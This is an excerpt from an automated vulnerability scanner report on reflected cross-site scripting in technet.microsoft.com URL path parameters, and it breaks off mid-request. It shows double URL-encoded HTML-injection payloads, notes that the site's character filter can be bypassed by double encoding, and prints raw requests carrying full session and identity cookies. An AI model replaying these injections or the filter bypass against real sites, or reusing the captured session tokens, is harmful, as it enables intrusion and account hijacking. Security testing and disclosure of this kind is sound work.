<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us1793f"><a>b68b233da00/library/bb727067" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a157%2522%253e%253ca%253e468fcae21f5 was submitted in the REST URL parameter 2. This input was echoed as 9a157"><a>468fcae21f5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9a157%2522%253e%253ca%253e468fcae21f5/bb727067.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9a157"><a>468fcae21f5/bb727067" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87d4%2522%253e%253ca%253ec2cdf0cd2d was submitted in the REST URL parameter 3. This input was echoed as a87d4"><a>c2cdf0cd2d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727067.aspxa87d4%2522%253e%253ca%253ec2cdf0cd2d HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10208 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727067.aspxa87d4"><a>c2cdf0cd2d" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22725%2522%253e%253ca%253eb76dc023418 was submitted in the REST URL parameter 1. This input was echoed as 22725"><a>b76dc023418 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us22725%2522%253e%253ca%253eb76dc023418/library/bb727069.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:25:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us22725"><a>b76dc023418/library/bb727069" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a394%2522%253e%253ca%253e7a645869883 was submitted in the REST URL parameter 1. This input was echoed as 2a394"><a>7a645869883 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us2a394%2522%253e%253ca%253e7a645869883/library/bb727070.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us2a394"><a>7a645869883/library/bb727070" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73213%2522%253e%253ca%253ee7b19e7d711 was submitted in the REST URL parameter 2. This input was echoed as 73213"><a>e7b19e7d711 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library73213%2522%253e%253ca%253ee7b19e7d711/bb727070.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library73213"><a>e7b19e7d711/bb727070" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35f4%2522%253e%253ca%253e1af6e525b2c was submitted in the REST URL parameter 3. This input was echoed as d35f4"><a>1af6e525b2c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727070.aspxd35f4%2522%253e%253ca%253e1af6e525b2c HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 